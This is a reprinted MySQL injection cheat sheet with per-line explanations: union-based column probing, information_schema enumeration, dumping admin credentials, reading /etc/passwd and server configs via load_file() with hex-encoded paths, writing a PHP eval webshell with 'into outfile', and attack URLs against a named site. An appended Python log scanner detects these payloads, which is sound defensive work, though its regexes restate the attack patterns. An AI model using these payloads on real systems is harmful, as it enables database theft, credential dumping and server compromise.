- and ord(mid(version(),1,1))>51
- Explanation 1: Determines the database version. 51 is the ASCII code of "3": a normal return means the version is above 4.0, an error means it is below 4.0; when the version is greater than 3.0 the union method can be used.
- Explanation 2: ord() is a MySQL function that returns the character code of a character.
- Explanation 3: mid() is a MySQL function used for substring extraction.
- Explanation 4: version() is a MySQL function that returns the version of the current database.
- union select 1,1,1,...,1,1
- Explanation: A union query used to test the number of columns returned by the current SQL query.
- order by 13
- Explanation: Sorting clause; by varying the number, it tests how many columns the current SQL query returns.
- union select 1,2,3,4,...,11,12,13 from admin
- Explanation: A normal return means the table admin exists.
- union select 1,version(),3,... from admin
- Explanation: Dumps the database version.
- union select 1,username,3,... from admin
- Explanation: Dumps account names/passwords.
- union select 1,username,3,... from admin where id=2
- Explanation: Dumps the second user of the admin table; the primary key is id.
- and ord(mid(user(),1,1))=114
- Explanation: A normal return means the connection has root privileges.
- and 1=1 union select 1,2,3,4,5,...,N
- Explanation: Matching the number of columns.
- and 1=2 union select 1,2,3,4,5,...,N
- Explanation: Dumps which column positions are displayed on the page.
- version() database() user()
- Explanation: Built-in functions used to dump database information.
- Dumping database information without guessing the displayable columns (does not work on some sites):
- and 1=2 union all select version()
- and 1=2 union all select database()
- and 1=2 union all select user()
- and 1=2 union all select @@global.version_compile_os from mysql.user
- Explanation: Gets operating system information.
- and ord(mid(user(),1,1))=114
- Explanation: Gets the database privilege level; a normal return means root privileges.
- and 1=2 union select 1,2,3,schema_name,5,6,7,8,9,10 from information_schema.schemata limit 0,1
- Explanation: Dumping databases (MySQL > 5.0). MySQL 5 has a built-in database, information_schema, that stores the structure information of all MySQL databases and tables.
- and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10 from information_schema.tables where table_schema=<database name in hex> limit 0,1 (in limit 0,1 the first number is the starting record, 0 being the first, and the second is the number of records shown)
- Explanation: Guessing tables.
- and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10 from information_schema.columns where table_name=<table name in hex> limit 0,1
- Explanation: Guessing columns.
- and 1=2 union select 1,2,3,<username column>,5,6,7,<password column>,8,9 from <table name> limit 0,1
- Explanation: Dumping passwords.
- union select 1,2,3,concat(<username column>,0x3c,<password column>),5,6,7,8,9 from <table name> limit 0,1
- Explanation: Advanced usage (one displayable column shows two pieces of data).
- Writing a webshell directly (root privileges)
- Condition 1: the site's physical path is known
- Condition 2: sufficient privileges (can be tested with select ... from mysql.user)
- Condition 3: magic_quotes_gpc=off. select '<?php eval($_post[cmd])?>' into outfile '<physical path>', or: and 1=2 union all select <hex value of the statement> into outfile '<path>'
- Common paths for load_file():
- replace(load_file(0x2f6574632f706173737764),0x3c,0x20)
- replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
- Explanation: The two statements above display the complete code of a PHP file. Without replacing certain characters, for example replacing "<" with a space, the returned page is rendered as HTML and the code cannot be seen.
- load_file(char(47))
- Explanation: Can list the root directory on FreeBSD and SunOS.
- /etc/httpd/conf/httpd.conf or /usr/local/apache/conf/httpd.conf
- Explanation: View the Linux Apache virtual host configuration file.
- C:\Program files\apache group\apache\conf\httpd.conf or C:\apache\conf\httpd.conf
- Explanation: View the Apache configuration file on Windows.
- C:/resin-3.0.14/conf/resin.conf
- Explanation: View the Resin configuration of a site developed in JSP.
- C:/resin/conf/resin.conf, /usr/local/resin/conf/resin.conf
- Explanation: View the JSP virtual host configuration on Linux.
- D:\APACHE\Apache2\conf\httpd.conf
- C:\Program Files\mysql\my.ini
- ../themes/darkblue_orange/layout.inc.php (phpMyAdmin)
- Explanation: Reveals the physical path.
- C:\windows\system32\inetsrv\MetaBase.xml
- Explanation: View the IIS virtual host configuration file.
- /usr/local/resin-3.0.22/conf/resin.conf
- Explanation: View the Resin 3.0.22 configuration file.
- /usr/local/resin-pro-3.0.22/conf/resin.conf
- Explanation: Same as above.
- /usr/local/app/apache2/conf/extra/httpd-vhosts.conf
- Explanation: View the Apache virtual hosts.
- /etc/sysconfig/iptables
- Explanation: View the firewall policy.
- /usr/local/app/php5/lib/php.ini
- Explanation: PHP configuration.
- /etc/my.cnf
- Explanation: MySQL configuration file.
- /etc/redhat-release
- Explanation: Red Hat system version.
- C:\mysql\data\mysql\user.MYD
- Explanation: Stores the passwords of the MySQL system users.
- /etc/sysconfig/network-scripts/ifcfg-eth0
- /usr/local/app/php5/lib/php.ini
- Explanation: PHP-related settings.
- /usr/local/app/apache2/conf/extra/httpd-vhosts.conf
- Explanation: Virtual site settings.
- C:\Program Files\rhinosoft.com\serv-u\servudaemon.ini
- C:\windows\my.ini
- C:\Boot.ini
- Common website configuration files: config.inc.php, config.php. Read them with load_file(), using replace(load_file(<hex>),char(60),char(32)).
- Note: char(60) represents "<" and char(32) represents a space.
- Problems with manual injection:
- After injection the page shows: illegal mix of collations (latin1_swedish_ci,implicit) and (utf8_general_ci,implicit) for operation 'UNION'
- For example: http://www.www.myhack58.com/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433a5c626f6f742e696e69),3,4,user()%20. This is caused by inconsistent character set encodings. Workaround: wrap the parameter in unhex(hex(parameter)). The URL above can be changed to http://www.www.myhack58.com/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433a5c626f6f742e696e69))),3,4,unhex(hex(user))%20, and the injection can continue.
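From the defender's side, every statement catalogued above leaves a recognisable trace in the web server's access log: the URL-encoded `union select`, `ord(mid(version(),1,1))`, `information_schema.*`, `load_file(`, `into outfile` and `unhex(hex(` fragments, plus the hex literals that hide file paths. The Python below is an added example and not part of the original list; it scans access-log lines for those shapes, URL-decodes twice to unwrap double encoding, and decodes `0x...` literals so an analyst sees the path behind a `load_file()` call without hand-converting hex. The log lines, client addresses, script names and signature names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines for this example (not taken from any real
# server). The query strings reuse the payload shapes listed on this page; the
# client addresses and script names are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /instrument.php?ID=13 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /instrument.php?ID=13%20and%20ord(mid(version(),1,1))%3E51 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:49 +0000] "GET /instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433a5c626f6f742e696e69),3,4,user() HTTP/1.1" 200 7311
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /instrument.php?ID=13%20and%201=2%20union%20select%201,2,3,table_name,5%20from%20information_schema.tables%20limit%200,1 HTTP/1.1" 200 5200
198.51.100.7 - - [10/Oct/2023:13:57:10 +0000] "GET /search.php?q=union+station+schedule HTTP/1.1" 200 900
"""

# Combined-log-format fields this example needs: client, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# One regex per technique catalogued on this page, applied to the decoded,
# whitespace-collapsed, lower-cased query string. Names are this example's own.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "fingerprint": re.compile(r"\bord\s*\(\s*mid\s*\(\s*(version|user)\s*\(\s*\)"),
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(schemata|tables|columns)\b"),
    "file_read": re.compile(r"\bload_file\s*\("),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b"),
    "os_fingerprint": re.compile(r"@@global\.version_compile_os"),
    "collation_bypass": re.compile(r"\bunhex\s*\(\s*hex\s*\("),
}

# MySQL hex literal such as 0x2f6574632f706173737764 (/etc/passwd).
HEX_LITERAL = re.compile(r"\b0x([0-9a-f]+)\b")


def normalise(query: str) -> str:
    """URL-decode twice (to unwrap double encoding), collapse whitespace, lower-case."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).strip().lower()


def decode_hex_literals(query: str) -> list:
    """Reveal the strings behind 0x... literals, e.g. the path handed to load_file()."""
    found = []
    for match in HEX_LITERAL.finditer(query.lower()):
        digits = match.group(1)
        if len(digits) % 2:
            continue  # odd length cannot be a byte string
        text = bytes.fromhex(digits).decode("utf-8", errors="replace")
        if text.isprintable():
            found.append(text)
    return found


def scan_line(line: str):
    """Return a finding dict for one log line, or None when nothing matched."""
    match = LOG_RE.match(line)
    if not match:
        return None
    path, _, query = match.group("target").partition("?")
    if not query:
        return None
    normalised = normalise(query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(normalised)]
    if not hits:
        return None
    return {
        "ip": match.group("ip"),
        "path": path,
        "status": match.group("status"),
        "signatures": hits,
        "hex_literals": decode_hex_literals(normalised),
    }


def scan_log(text: str) -> list:
    """Scan every line of an access log and keep only the lines that matched."""
    return [f for f in (scan_line(ln) for ln in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Feed the contents of a real access log to `scan_log()` to use it beyond the sample. The benign `search.php?q=union+station+schedule` line is included deliberately: the `union_select` signature requires `select` after `union`, so ordinary search terms do not trigger it, and the `200` status on the matched lines is the detail worth alerting on, since the page describes each statement as succeeding when the server returns "normally".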
- Reprinted from: 47945745
MySQL Injection statement